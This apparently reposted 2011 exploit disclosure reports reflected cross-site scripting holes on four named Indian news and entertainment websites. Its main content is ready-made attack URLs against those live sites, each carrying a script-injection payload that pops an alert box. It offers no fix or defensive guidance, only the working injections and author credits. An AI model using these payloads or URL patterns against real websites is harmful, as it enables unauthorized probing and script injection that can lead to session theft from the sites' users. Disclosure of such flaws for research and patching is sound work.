Various Indian Sites Cross Site Scripting

Business.in.com, Cricketnext.in.com, Hooked-in.com, and Connect.in.com all suffer from cross site 
scripting vulnerabilities.
http://packetstormsecurity.org/files/author/9003/ 
# Exploit Title: *.in.com XSS vulnerability
# Vendor: various
# Date: 6th july,2011
# Author: r007k17 a.k.a Raghavendra Karthik D
# link: https://shadowrootkit.wordpress.com/
# Google Dork:   © Copyright 2010, Business.in.com
************************************************************

{DEMO} :
http://business.in.com/search.php?searchtext=%22%3E%3Cscript%3Ealert%28/s/%29%3C/script%3E

EXPLOIT: "><script>alert(/s/)</script>

{DEMO} :
http://cricketnext.in.com/search/searchnews.php?search_value=%22%3E%3Cscript%3Ealert%28%2Fs%2F%29%3C%2Fscript%3E

EXPLOIT: "><script>alert(/s/)</script>

{DEMO} :
http://hooked-in.com/waterbodies/search?q=%22%3E%3Cscript%3Ealert%28%2Fr007k17%2F%29%3C%2Fscript%3E

EXPLOIT: "><script>alert(/r007k17/)</script>

 Reflected XSS in  connect.in.com
 Inject EXPLOIT below in search field in http://connect.in.com
observe a pop-up saying r007k17

{DEMO} :   http://connect.in.com

EXPLOIT: "><script>alert(/r007k17/)</script>

************************************************************
 sp3c14l Thanks to s1d3^effects and my friends@!3.14--
************************************************************
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: